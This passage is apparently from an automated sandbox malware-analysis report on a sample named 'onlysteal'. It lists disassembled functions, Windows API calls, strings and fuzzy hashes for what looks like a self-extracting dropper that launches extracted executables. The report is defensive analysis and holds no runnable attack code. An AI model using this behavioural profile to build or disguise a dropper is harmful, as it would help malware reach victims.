431->425 432->431 453 24c855-24c869 SetFileAttributesW 436->453 454 24c9aa-24c9b9 call 23a55a 436->454 440 24cb7f-24cb97 call 253e13 437->440 441 24cbab-24cbce call 253e13 * 2 437->441 464 24cb6c-24cb6e 438->464 465 24cb6a 438->465 440->441 457 24cb99-24cba6 call 2405da 440->457 441->426 475 24cbd0-24cbde call 2405da 441->475 446->447 452 24cc0c-24cc0e 446->452 482 24cc67-24cc6b 447->482 452->447 458 24c90f-24c91f GetFileAttributesW 453->458 459 24c86f-24c8a2 call 23b991 call 23b690 call 253e13 453->459 454->369 457->441 458->436 470 24c921-24c930 DeleteFileW 458->470 491 24c8a4-24c8b3 call 253e13 459->491 492 24c8b5-24c8c3 call 23bdb4 459->492 464->437 465->464 470->436 474 24c932-24c935 470->474 478 24c939-24c965 call 234092 GetFileAttributesW 474->478 475->426 487 24c937-24c938 478->487 488 24c967-24c97d MoveFileW 478->488 482->369 486 24cc71-24cc85 SendMessageW 482->486 486->369 487->478 488->436 490 24c97f-24c989 MoveFileExW 488->490 490->436 491->492 497 24c8c9-24c908 call 253e13 call 24fff0 491->497 492->454 492->497 497->458
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0024C744
                                        • Part of subcall function 0024B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0024B3FB
                                        • Part of subcall function 0024AF98: _wcschr.LIBVCRUNTIME ref: 0024B033
                                      • _wcslen.LIBCMT ref: 0024CA0A
                                      • _wcslen.LIBCMT ref: 0024CA13
                                      • SetWindowTextW.USER32(?,?), ref: 0024CA71
                                      • _wcslen.LIBCMT ref: 0024CAB3
                                      • _wcsrchr.LIBVCRUNTIME ref: 0024CBFB
                                      • GetDlgItem.USER32(?,00000066), ref: 0024CC36
                                      • SetWindowTextW.USER32(00000000,?), ref: 0024CC46
                                      • SendMessageW.USER32(00000000,00000143,00000000,0027A472), ref: 0024CC54
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0024CC7F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                      • String ID: %s.%d.tmp$<br>$<$$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$$
                                      • API String ID: 986293930-4008444337
                                      • Opcode ID: 24a73bb7123ffc6388f5898a653e32c63262ef6e4c499b103ae084faea89d323
                                      • Instruction ID: df09ecb926b5db3dbe131945a946b006dcbff758822d07b00c1da5b0d1e7d9a7
                                      • Opcode Fuzzy Hash: 24a73bb7123ffc6388f5898a653e32c63262ef6e4c499b103ae084faea89d323
                                      • Instruction Fuzzy Hash: B1E165B2910119AADF29DFA4DD85EEE77BCAF05350F5040A6FA09E3050EB749F948F60
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0023DA70
                                      • _wcschr.LIBVCRUNTIME ref: 0023DA91
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0023DAAC
                                        • Part of subcall function 0023C29A: _wcslen.LIBCMT ref: 0023C2A2
                                        • Part of subcall function 002405DA: _wcslen.LIBCMT ref: 002405E0
                                        • Part of subcall function 00241B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0023BAE9,00000000,?,?,?,00010438), ref: 00241BA0
                                      • _wcslen.LIBCMT ref: 0023DDE9
                                      • __fprintf_l.LIBCMT ref: 0023DF1C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9&
                                      • API String ID: 557298264-1855252971
                                      • Opcode ID: 00e5589986237ca6d18b8ad4678fe9359573aa3399af0b6982a5ca8d47776672
                                      • Instruction ID: b0804d5d4f80797be76bf3d941aa437add8d73ef8b46b13ae402d72ce18a4b80
                                      • Opcode Fuzzy Hash: 00e5589986237ca6d18b8ad4678fe9359573aa3399af0b6982a5ca8d47776672
                                      • Instruction Fuzzy Hash: F532F2B1920219DBCF28EF68D842BEA77A9FF04700F41055AF945A7281E7B1DDA9CF50

                                      APIs
                                        • Part of subcall function 0024B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0024B579
                                        • Part of subcall function 0024B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0024B58A
                                        • Part of subcall function 0024B568: IsDialogMessageW.USER32(00010438,?), ref: 0024B59E
                                        • Part of subcall function 0024B568: TranslateMessage.USER32(?), ref: 0024B5AC
                                        • Part of subcall function 0024B568: DispatchMessageW.USER32(?), ref: 0024B5B6
                                      • GetDlgItem.USER32(00000068,0028FCB8), ref: 0024D4E8
                                      • ShowWindow.USER32(00000000,00000005,?,?,?,0024AF07,00000001,?,?,0024B7B9,0026506C,0028FCB8,0028FCB8,00001000,00000000,00000000), ref: 0024D510
                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0024D51B
                                      • SendMessageW.USER32(00000000,000000C2,00000000,002635F4), ref: 0024D529
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0024D53F
                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0024D559
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0024D59D
                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0024D5AB
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0024D5BA
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0024D5E1
                                      • SendMessageW.USER32(00000000,000000C2,00000000,002643F4), ref: 0024D5F0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                      • String ID: \
                                      • API String ID: 3569833718-2967466578
                                      • Opcode ID: 4c63f86d96d3a676e8f90c881bb34e6407954c4a56d737965cc6927c87f16b98
                                      • Instruction ID: 69b37caf6f823b4d40ae5d2a99bffda76ea8a829d9a08bc255fd97522fbda208
                                      • Opcode Fuzzy Hash: 4c63f86d96d3a676e8f90c881bb34e6407954c4a56d737965cc6927c87f16b98
                                      • Instruction Fuzzy Hash: 2231C271145342BFE301DF20EC4EFAB7FACEB86708F000519F551D61A0DB659A148B76

                                      Control-flow Graph

                                      control_flow_graph 836 24d78f-24d7a7 call 24ec50 839 24d7ad-24d7b9 call 253e13 836->839 840 24d9e8-24d9f0 836->840 839->840 843 24d7bf-24d7e7 call 24fff0 839->843 846 24d7f1-24d7ff 843->846 847 24d7e9 843->847 848 24d801-24d804 846->848 849 24d812-24d818 846->849 847->846 850 24d808-24d80e 848->850 851 24d85b-24d85e 849->851 852 24d837-24d844 850->852 853 24d810 850->853 851->850 854 24d860-24d866 851->854 858 24d9c0-24d9c2 852->858 859 24d84a-24d84e 852->859 857 24d822-24d82c 853->857 855 24d86d-24d86f 854->855 856 24d868-24d86b 854->856 860 24d882-24d898 call 23b92d 855->860 861 24d871-24d878 855->861 856->855 856->860 862 24d82e 857->862 863 24d81a-24d820 857->863 864 24d9c6 858->864 859->864 865 24d854-24d859 859->865 872 24d8b1-24d8bc call 23a231 860->872 873 24d89a-24d8a7 call 241fbb 860->873 861->860 866 24d87a 861->866 862->852 863->857 868 24d830-24d833 863->868 870 24d9cf 864->870 865->851 866->860 868->852 871 24d9d6-24d9d8 870->871 874 24d9e7 871->874 875 24d9da-24d9dc 871->875 882 24d8be-24d8d5 call 23b6c4 872->882 883 24d8d9-24d8e6 ShellExecuteExW 872->883 873->872 881 24d8a9 873->881 874->840 875->874 878 24d9de-24d9e1 ShowWindow 875->878 878->874 881->872 882->883 883->874 884 24d8ec-24d8f9 883->884 887 24d90c-24d90e 884->887 888 24d8fb-24d902 884->888 890 24d925-24d944 call 24dc3b 887->890 891 24d910-24d919 887->891 888->887 889 24d904-24d90a 888->889 889->887 892 24d97b-24d987 CloseHandle 889->892 890->892 905 24d946-24d94e 890->905 891->890 899 24d91b-24d923 ShowWindow 891->899 893 24d998-24d9a6 892->893 894 24d989-24d996 call 241fbb 892->894 893->871 898 24d9a8-24d9aa 893->898 894->870 894->893 898->871 902 24d9ac-24d9b2 898->902 899->890 902->871 904 24d9b4-24d9be 902->904 904->871 905->892 906 24d950-24d961 GetExitCodeProcess 905->906 906->892 907 24d963-24d96d 906->907 908 24d974 907->908 909 24d96f 907->909 908->892 909->908
                                      APIs
                                      • _wcslen.LIBCMT ref: 0024D7AE
                                      • ShellExecuteExW.SHELL32(?), ref: 0024D8DE
                                      • ShowWindow.USER32(?,00000000), ref: 0024D91D
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 0024D959
                                      • CloseHandle.KERNEL32(?), ref: 0024D97F
                                      • ShowWindow.USER32(?,00000001), ref: 0024D9E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                      • String ID: .exe$.inf$h$$r$
                                      • API String ID: 36480843-546698491
                                      • Opcode ID: efd38176652de2ea3908cf403af963d26a9b1097044f84856fa7da697ba0656a
                                      • Instruction ID: ac39db456828017e266c06864f0605b5e83363e371b3abdc336eeb5e2079063b
                                      • Opcode Fuzzy Hash: efd38176652de2ea3908cf403af963d26a9b1097044f84856fa7da697ba0656a
                                      • Instruction Fuzzy Hash: B85104744243829ADB359F24A848BBBBBE4AF81744F04081EF9C5D71A1D7B1CEA5CB12

                                      Control-flow Graph

                                      control_flow_graph 910 25a95b-25a974 911 25a976-25a986 call 25ef4c 910->911 912 25a98a-25a98f 910->912 911->912 919 25a988 911->919 914 25a991-25a999 912->914 915 25a99c-25a9c0 MultiByteToWideChar 912->915 914->915 917 25a9c6-25a9d2 915->917 918 25ab53-25ab66 call 24fbbc 915->918 920 25a9d4-25a9e5 917->920 921 25aa26 917->921 919->912 924 25aa04-25aa15 call 258e06 920->924 925 25a9e7-25a9f6 call 262010 920->925 923 25aa28-25aa2a 921->923 928 25aa30-25aa43 MultiByteToWideChar 923->928 929 25ab48 923->929 924->929 935 25aa1b 924->935 925->929 938 25a9fc-25aa02 925->938 928->929 932 25aa49-25aa5b call 25af6c 928->932 933 25ab4a-25ab51 call 25abc3 929->933 940 25aa60-25aa64 932->940 933->918 939 25aa21-25aa24 935->939 938->939 939->923 940->929 942 25aa6a-25aa71 940->942 943 25aa73-25aa78 942->943 944 25aaab-25aab7 942->944 943->933 947 25aa7e-25aa80 943->947 945 25ab03 944->945 946 25aab9-25aaca 944->946 950 25ab05-25ab07 945->950 948 25aae5-25aaf6 call 258e06 946->948 949 25aacc-25aadb call 262010 946->949 947->929 951 25aa86-25aaa0 call 25af6c 947->951 954 25ab41-25ab47 call 25abc3 948->954 966 25aaf8 948->966 949->954 964 25aadd-25aae3 949->964 950->954 955 25ab09-25ab22 call 25af6c 950->955 951->933 963 25aaa6 951->963 954->929 955->954 967 25ab24-25ab2b 955->967 963->929 968 25aafe-25ab01 964->968 966->968 969 25ab67-25ab6d 967->969 970 25ab2d-25ab2e 967->970 968->950 971 25ab2f-25ab3f WideCharToMultiByte 969->971 970->971 971->954 972 25ab6f-25ab76 call 25abc3 971->972 972->933
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00255695,00255695,?,?,?,0025ABAC,00000001,00000001,2DE85006), ref: 0025A9B5
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0025ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0025AA3B
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0025AB35
                                      • __freea.LIBCMT ref: 0025AB42
                                        • Part of subcall function 00258E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0025CA2C,00000000,?,00256CBE,?,00000008,?,002591E0,?,?,?), ref: 00258E38
                                      • __freea.LIBCMT ref: 0025AB4B
                                      • __freea.LIBCMT ref: 0025AB70
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: a9958cfde3475bed11ddbacdf8443e28dcd7049dbd33a14d9a7961199524f35e
                                      • Instruction ID: bd6ae17ddb7ffa400246bd6ef11ff904d34a9dc9432ff42bb6a2ccf0ed88d3b0
                                      • Opcode Fuzzy Hash: a9958cfde3475bed11ddbacdf8443e28dcd7049dbd33a14d9a7961199524f35e
                                      • Instruction Fuzzy Hash: F9511372A20213ABDB258F64CC43EBBB7ABEB60715F154728FC04D6140DB70DC68C69A

                                      Control-flow Graph

                                      control_flow_graph 975 253b72-253b7c 976 253bee-253bf1 975->976 977 253bf3 976->977 978 253b7e-253b8c 976->978 979 253bf5-253bf9 977->979 980 253b95-253bb1 LoadLibraryExW 978->980 981 253b8e-253b91 978->981 982 253bb3-253bbc GetLastError 980->982 983 253bfa-253c00 980->983 984 253b93 981->984 985 253c09-253c0b 981->985 987 253be6-253be9 982->987 988 253bbe-253bd3 call 256088 982->988 983->985 989 253c02-253c03 FreeLibrary 983->989 986 253beb 984->986 985->979 986->976 987->986 988->987 992 253bd5-253be4 LoadLibraryExW 988->992 989->985 992->983 992->987
                                      APIs
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00253C35,?,?,00292088,00000000,?,00253D60,00000004,InitializeCriticalSectionEx,00266394,InitializeCriticalSectionEx,00000000), ref: 00253C03
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID: api-ms-
                                      • API String ID: 3664257935-2084034818
                                      • Opcode ID: afb2d8f9c597c311b0c61277769ab2f8cbe67c133ee21b019afd78a5a7b61569
                                      • Instruction ID: 1f014b59f94b2246a0d5cb459648165676efc87836bb545e860dc4a327942ee9
                                      • Opcode Fuzzy Hash: afb2d8f9c597c311b0c61277769ab2f8cbe67c133ee21b019afd78a5a7b61569
                                      • Instruction Fuzzy Hash: BF110A31A25222ABCB21CF689C4975D77A49F017F6F151111EC11FB290D7B1EF1886D8

                                      Control-flow Graph

                                      control_flow_graph 993 2398e0-239901 call 24ec50 996 239903-239906 993->996 997 23990c 993->997 996->997 998 239908-23990a 996->998 999 23990e-23991f 997->999 998->999 1000 239921 999->1000 1001 239927-239931 999->1001 1000->1001 1002 239933 1001->1002 1003 239936-239943 call 236edb 1001->1003 1002->1003 1006 239945 1003->1006 1007 23994b-23996a CreateFileW 1003->1007 1006->1007 1008 2399bb-2399bf 1007->1008 1009 23996c-23998e GetLastError call 23bb03 1007->1009 1010 2399c3-2399c6 1008->1010 1013 2399c8-2399cd 1009->1013 1015 239990-2399b3 CreateFileW GetLastError 1009->1015 1012 2399d9-2399de 1010->1012 1010->1013 1017 2399e0-2399e3 1012->1017 1018 2399ff-239a10 1012->1018 1013->1012 1016 2399cf 1013->1016 1015->1010 1019 2399b5-2399b9 1015->1019 1016->1012 1017->1018 1020 2399e5-2399f9 SetFileTime 1017->1020 1021 239a12-239a2a call 240602 1018->1021 1022 239a2e-239a39 1018->1022 1019->1010 1020->1018 1021->1022
                                      APIs
                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00237760,?,00000005,?,00000011), ref: 0023995F
                                      • GetLastError.KERNEL32(?,?,00237760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0023996C
                                      • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00237760,?,00000005,?), ref: 002399A2
                                      • GetLastError.KERNEL32(?,?,00237760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002399AA
                                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00237760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002399F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: File$CreateErrorLast$Time
                                      • String ID:
                                      • API String ID: 1999340476-0
                                      • Opcode ID: 0afcfb7e554d48a81863a3fb2fed27c87e97491adf29c98516871ce0575da5e2
                                      • Instruction ID: 387b35ff639a3b79e5156218888806e8d8939f5927ea7ee7e8fa397d585e78b8
                                      • Opcode Fuzzy Hash: 0afcfb7e554d48a81863a3fb2fed27c87e97491adf29c98516871ce0575da5e2
                                      • Instruction Fuzzy Hash: 5E3108705547466FE730DF24CC85BDABB94BB06320F100719F5A1961D1D7F4A9A8CB91

                                      Control-flow Graph (graph image not extracted; summarised from the graph data): basic blocks 24b568 through 24b5be; API calls PeekMessageW, GetMessageW, IsDialogMessageW, TranslateMessage and DispatchMessageW; no internal calls.
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0024B579
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0024B58A
                                      • IsDialogMessageW.USER32(00010438,?), ref: 0024B59E
                                      • TranslateMessage.USER32(?), ref: 0024B5AC
                                      • DispatchMessageW.USER32(?), ref: 0024B5B6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 1266772231-0
                                      • Opcode ID: 8c07912393d67937931e2f4552ca6dd208110ba8492d426053e301c885bf79a1
                                      • Instruction ID: 9ffe7f3b52c0bb8d9a47690d7798c66f2e5c1ab9d36f625313e4643250967a39
                                      • Opcode Fuzzy Hash: 8c07912393d67937931e2f4552ca6dd208110ba8492d426053e301c885bf79a1
                                      • Instruction Fuzzy Hash: 94F0D071A0122AAB8B20DFE5EC4DDDBBFBCEE053917404415B519D2010EB74D605CBB0

                                      Control-flow Graph (graph image not extracted; summarised from the graph data): basic blocks 24abab through 24ac01; internal call to 241fbb; API calls GetClassNameW, FindWindowExW and SHAutoComplete.
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000050), ref: 0024ABC2
                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 0024ABF9
                                        • Part of subcall function 00241FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0023C116,00000000,.exe,?,?,00000800,?,?,?,00248E3C), ref: 00241FD1
                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0024ABE9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                      • String ID: EDIT
                                      • API String ID: 4243998846-3080729518
                                      • Opcode ID: ec67ea112e5b9f2ffb5edcc140c77a078014d814ee925e16bcd197ba520bb08a
                                      • Instruction ID: 99d9bf884b017d2030dd67a6167f6639f7c227859db18d137a973cc956d0bafa
                                      • Opcode Fuzzy Hash: ec67ea112e5b9f2ffb5edcc140c77a078014d814ee925e16bcd197ba520bb08a
                                      • Instruction Fuzzy Hash: 66F0A73276122977DB309B24AC0AFDF76ACDF56B40F494012BA05F71C0D760DE9585B6

                                      APIs
                                        • Part of subcall function 0024081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00240836
                                        • Part of subcall function 0024081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0023F2D8,Crypt32.dll,00000000,0023F35C,?,?,0023F33E,?,?,?), ref: 00240858
                                      • OleInitialize.OLE32(00000000), ref: 0024AC2F
                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0024AC66
                                      • SHGetMalloc.SHELL32(00278438), ref: 0024AC70
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                      • String ID: riched20.dll
                                      • API String ID: 3498096277-3360196438
                                      • Opcode ID: 4f8a3059376d70296337475b4e06acd950a03a32e2682be781e16d3671b24537
                                      • Instruction ID: a73fcfe82167380582b31ae2822db243d45d841793893e3d0e2e4bbfa77d6598
                                      • Opcode Fuzzy Hash: 4f8a3059376d70296337475b4e06acd950a03a32e2682be781e16d3671b24537
                                      • Instruction Fuzzy Hash: 34F044B1900209ABCB10AFA9E8499AFFBFCEF84700F00405AA805A2201CBB456458FA0

                                      Control-flow Graph (graph image not extracted; summarised from the graph data): basic blocks 24dbde through 24dc38; internal calls to 24ec50, 240371 and 24048d; API calls SetEnvironmentVariableW (two call sites).
                                      APIs
                                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0024DBF4
                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0024DC30
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: EnvironmentVariable
                                      • String ID: sfxcmd$sfxpar
